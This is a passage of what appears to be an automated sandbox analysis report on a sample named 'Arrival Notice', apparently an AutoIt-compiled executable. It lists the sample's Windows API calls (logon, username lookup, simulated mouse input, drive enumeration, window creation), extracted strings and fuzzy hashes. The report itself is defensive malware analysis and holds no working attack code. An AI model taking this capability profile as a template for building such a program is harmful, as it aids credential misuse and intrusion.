                                              • Instruction Fuzzy Hash: C7E01A32250214AFCB10AF5AD844E9AB7E8EF94761F008426F849C7352DAB0A8408BA1
                                              APIs
                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00934EEC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: mouse_event
                                              • String ID:
                                              • API String ID: 2434400541-0
                                              • Opcode ID: b5ef4481c6ab9e99333799d54a8c0fdbc194a490723bf99baca8838745c34018
                                              • Instruction ID: e48638165ba7662d97d75923edd50095f19c3feaff7a25ef5b049eac6ec67177
                                              • Opcode Fuzzy Hash: b5ef4481c6ab9e99333799d54a8c0fdbc194a490723bf99baca8838745c34018
                                              • Instruction Fuzzy Hash: E3D052AA1607083AED388B249C6FF77020CF301782FD24AAAB102890C2E8D47C91A830
                                              APIs
                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,009288D1), ref: 00928CB3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: LogonUser
                                              • String ID:
                                              • API String ID: 1244722697-0
                                              • Opcode ID: d8a774f8f4fee9ad64d344fc89de0da576e2d0e2f84edf52b777c0396812002a
                                              • Instruction ID: 7e88ea938d2ac91c3ccf57b250997a4dd33f0f02d12478232e71bc3d267be582
                                              • Opcode Fuzzy Hash: d8a774f8f4fee9ad64d344fc89de0da576e2d0e2f84edf52b777c0396812002a
                                              • Instruction Fuzzy Hash: 5FD05E3226460EABEF018EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?), ref: 00912242
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: NameUser
                                              • String ID:
                                              • API String ID: 2645101109-0
                                              • Opcode ID: 34b75094bd983f56924365694103fdca81e64779454a7f2e1161c7dc0dbcbcc2
                                              • Instruction ID: 3435465bf640b75798ea134221bff654c01cae254ea2146140eb59c8abc51466
                                              • Opcode Fuzzy Hash: 34b75094bd983f56924365694103fdca81e64779454a7f2e1161c7dc0dbcbcc2
                                              • Instruction Fuzzy Hash: 64C04CF181510DDBDB05DBA0D998DEE77BCAB04315F144455A101F2140D7749B449B71
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 008FA36A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: f7c1b747307fd1b8f95e9f16735467971bca9b8a435ceb560a165ceab5071557
                                              • Instruction ID: 56b09929b066e25f495ee163d01d500f06eb3e1bbdd375f9a00ebd24b304a8cc
                                              • Opcode Fuzzy Hash: f7c1b747307fd1b8f95e9f16735467971bca9b8a435ceb560a165ceab5071557
                                              • Instruction Fuzzy Hash: 92A0113002820CAB8A002F82EC08888BFACEA002E2B008020F80C800328B32A820AA80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 57a57937ee475359391447dcc58e1df00aafe76dc0e56f5ca1eb0f7603274cee
                                              • Instruction ID: 935929ede7cc3a9c63ce89878bb45285be28103d555cbbeae45d7234bfe81f70
                                              • Opcode Fuzzy Hash: 57a57937ee475359391447dcc58e1df00aafe76dc0e56f5ca1eb0f7603274cee
                                              • Instruction Fuzzy Hash: 7F2268305056A6DBCF28CB2AD4C467DB7A1FB43314F3A842AD84ADB295DB34DD81CB61
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction ID: 381811f22137f033ad7afd389aa5dd92bba000ae51c39f3262036e5b7a1247a9
                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction Fuzzy Hash: B9C193322150974ADF6D863AD43413EBAE1FEA27B131A076DE5B3CB5D4EF20D624D620
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction ID: 1a1fb9d43765e6f513b19cdd1b0370ea6fbef9c86bcb691d1fce38dadc36ded2
                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction Fuzzy Hash: 7FC196322151A749DF2D463AD43403EBBE1FBA27B131A076DE5B2DB5D4EF20D624E620
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                              • Instruction ID: d7eb66ba0e846e79f89c1dfa1ddf65a4e0dcd00146cd69c6d28bb450359566a1
                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                              • Instruction Fuzzy Hash: CBC1833221519789DF2D463A947803EBBE1FBA27B131A076DE5B3CB5D4EF20D624D620
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00947B70
                                              • DeleteObject.GDI32(00000000), ref: 00947B82
                                              • DestroyWindow.USER32 ref: 00947B90
                                              • GetDesktopWindow.USER32 ref: 00947BAA
                                              • GetWindowRect.USER32(00000000), ref: 00947BB1
                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00947CF2
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00947D02
                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947D4A
                                              • GetClientRect.USER32(00000000,?), ref: 00947D56
                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00947D90
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DB2
                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DC5
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DD0
                                              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DD9
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DE8
                                              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DF1
                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947DF8
                                              • GlobalFree.KERNEL32(00000000), ref: 00947E03
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947E15
                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00962CAC,00000000), ref: 00947E2B
                                              • GlobalFree.KERNEL32(00000000), ref: 00947E3B
                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00947E61
                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00947E80
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00947EA2
                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0094808F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                              • String ID: $AutoIt v3$DISPLAY$static
                                              • API String ID: 2211948467-2373415609
                                              • Opcode ID: 4a68b0e7ccc12a5b873e9f9e3031f2b687ec0defdd33fb398cf2ea8d18ce884b
                                              • Instruction ID: 6383733445ec12157292f9c3f06991053421b4c786abaceea4b3d742c2459f13
                                              • Opcode Fuzzy Hash: 4a68b0e7ccc12a5b873e9f9e3031f2b687ec0defdd33fb398cf2ea8d18ce884b
                                              • Instruction Fuzzy Hash: A0029D71914209EFDB14DFA9CC99EAEBBB9FB48311F108559F915EB2A0CB309D00DB60
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,0095F910), ref: 009538AF
                                              • IsWindowVisible.USER32(?), ref: 009538D3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: BuffCharUpperVisibleWindow
                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                              • API String ID: 4105515805-45149045
                                              • Opcode ID: d4fbeff6d1da22ecc341983b022da16d518ecaffa3c564d4c2c52f88b8f9b804
                                              • Instruction ID: 624cb20c85889a29d0a6bf4c8d4e07366bafae22dbc723ace254745d339b4b46
                                              • Opcode Fuzzy Hash: d4fbeff6d1da22ecc341983b022da16d518ecaffa3c564d4c2c52f88b8f9b804
                                              • Instruction Fuzzy Hash: 7FD1A030204315DBCB24FF25C451A6AB7A5FF95385F048959FC869B3A3CB25EE0ACB52
                                              APIs
                                              • SetTextColor.GDI32(?,00000000), ref: 0095A89F
                                              • GetSysColorBrush.USER32(0000000F), ref: 0095A8D0
                                              • GetSysColor.USER32(0000000F), ref: 0095A8DC
                                              • SetBkColor.GDI32(?,000000FF), ref: 0095A8F6
                                              • SelectObject.GDI32(?,?), ref: 0095A905
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0095A930
                                              • GetSysColor.USER32(00000010), ref: 0095A938
                                              • CreateSolidBrush.GDI32(00000000), ref: 0095A93F
                                              • FrameRect.USER32(?,?,00000000), ref: 0095A94E
                                              • DeleteObject.GDI32(00000000), ref: 0095A955
                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0095A9A0
                                              • FillRect.USER32(?,?,?), ref: 0095A9D2
                                              • GetWindowLongW.USER32(?,000000F0), ref: 0095A9FD
                                                • Part of subcall function 0095AB60: GetSysColor.USER32(00000012), ref: 0095AB99
                                                • Part of subcall function 0095AB60: SetTextColor.GDI32(?,?), ref: 0095AB9D
                                                • Part of subcall function 0095AB60: GetSysColorBrush.USER32(0000000F), ref: 0095ABB3
                                                • Part of subcall function 0095AB60: GetSysColor.USER32(0000000F), ref: 0095ABBE
                                                • Part of subcall function 0095AB60: GetSysColor.USER32(00000011), ref: 0095ABDB
                                                • Part of subcall function 0095AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0095ABE9
                                                • Part of subcall function 0095AB60: SelectObject.GDI32(?,00000000), ref: 0095ABFA
                                                • Part of subcall function 0095AB60: SetBkColor.GDI32(?,00000000), ref: 0095AC03
                                                • Part of subcall function 0095AB60: SelectObject.GDI32(?,?), ref: 0095AC10
                                                • Part of subcall function 0095AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0095AC2F
                                                • Part of subcall function 0095AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0095AC46
                                                • Part of subcall function 0095AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0095AC5B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                              • String ID:
                                              • API String ID: 4124339563-0
                                              • Opcode ID: 2ed8c49b0247f39f077ff89e005142b6fcbe4ab044b506144ee5c9111c08828c
                                              • Instruction ID: b04bfe3678a7fa48848e7e8c0546df5e0d4729ed255ad0cc62d938a264d4bd57
                                              • Opcode Fuzzy Hash: 2ed8c49b0247f39f077ff89e005142b6fcbe4ab044b506144ee5c9111c08828c
                                              • Instruction Fuzzy Hash: 7FA18F72018301AFDB10DF66DC18A6B7BA9FF89332F104B29F962961E0D734D949DB52
                                              APIs
                                              • DestroyWindow.USER32(00000000), ref: 009477F1
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009478B0
                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009478EE
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00947900
                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00947946
                                              • GetClientRect.USER32(00000000,?), ref: 00947952
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00947996
                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009479A5
                                              • GetStockObject.GDI32(00000011), ref: 009479B5
                                              • SelectObject.GDI32(00000000,00000000), ref: 009479B9
                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009479C9
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009479D2
                                              • DeleteDC.GDI32(00000000), ref: 009479DB
                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00947A07
                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00947A1E
                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00947A59
                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00947A6D
                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00947A7E
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00947AAE
                                              • GetStockObject.GDI32(00000011), ref: 00947AB9
                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00947AC4
                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00947ACE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                              • API String ID: 2910397461-517079104
                                              • Opcode ID: 5a771e51a54380e57ef887f6611b1cb6d3e53649dadb1aaf8275c36eec72f501
                                              • Instruction ID: 8045a95c8ead72def2d9bc710f13bc0a7e067212290fc11dbcc2533ad7dbac21
                                              • Opcode Fuzzy Hash: 5a771e51a54380e57ef887f6611b1cb6d3e53649dadb1aaf8275c36eec72f501
                                              • Instruction Fuzzy Hash: 66A1A371A14209BFEB14DBA9DD4AFAEBBB9EB44711F004215FA14E72E0D770AD00DB60
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 0093AF89
                                              • GetDriveTypeW.KERNEL32(?,0095FAC0,?,\\.\,0095F910), ref: 0093B066
                                              • SetErrorMode.KERNEL32(00000000,0095FAC0,?,\\.\,0095F910), ref: 0093B1C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DriveType
                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                              • API String ID: 2907320926-4222207086
                                              • Opcode ID: 9878feb287db6ed086377e3e726dd7e6a700518b4ac2d57a338ac71e34e24661
                                              • Instruction ID: ab0c40183cc1af8bb741d6ec0a205953adc310cc943e20fba3b795207c898bb3
                                              • Opcode Fuzzy Hash: 9878feb287db6ed086377e3e726dd7e6a700518b4ac2d57a338ac71e34e24661
                                              • Instruction Fuzzy Hash: 9351E330A88305ABDB04EB94C9A297D73B1FB94345F204517E60AE7390D7B9AD01EF83
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                              • API String ID: 1038674560-86951937
                                              • Opcode ID: 24567dfa5fc6aae010cfa843c32b48d8604e3678f7f40059e555f3433c76e7f2
                                              • Instruction ID: dc570d1deb418c4218636993bbf8975c8bc3703acf3dcf58fe2fa4f01bc4b2a8
                                              • Opcode Fuzzy Hash: 24567dfa5fc6aae010cfa843c32b48d8604e3678f7f40059e555f3433c76e7f2
                                              • Instruction Fuzzy Hash: 888129B0600619BACB20AB75CC92FBE7758FF10714F044127FE46EA2C2FB60DA55C692
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00959D41
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00959DFA
                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 00959E16
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: 0
                                              • API String ID: 2326795674-4108050209
                                              • Opcode ID: 38d9ab519e60bd5b80203b8e0d7d8aa43346caa327fedd9f42f70b887dee6b1d
                                              • Instruction ID: b0ea67a6530c1d16cb4f81f57b9da02440bbb21267c769ed96221b2d141ed541
                                              • Opcode Fuzzy Hash: 38d9ab519e60bd5b80203b8e0d7d8aa43346caa327fedd9f42f70b887dee6b1d
